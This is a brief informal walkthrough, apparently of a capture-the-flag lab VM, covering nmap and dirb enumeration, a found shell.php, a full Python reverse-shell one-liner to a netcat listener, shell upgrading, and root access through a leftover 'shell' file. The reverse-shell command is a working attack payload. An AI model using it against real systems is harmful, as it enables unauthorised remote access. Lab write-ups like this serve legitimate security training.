Running nmap to see information about the host:
Nmap –A –T4 –p- 192.168.1.18 –vv

Lets run dirb on the site using –X .php to find php pages
Dirb http://192.168.1.18 –X .php

A page with the name shell.php is found ummmm ran it and I got :

And then using a python script to connect while running nc –lvp 4444 on my machine
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.11”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

And I got shell …. Breaking out of it
python -c ‘import pty; pty.spawn(“/bin/bash”)’
and if you get double characters use this command
stty raw –echo ( I googled it 😀 )
going straight to home we find we have user1 – user2 – user3 – user4 – user5 – user6 – user7 – user8
as I went from one to one and listing files as I reached user 3 I found a file named shell , ran it and im root, simple as that.
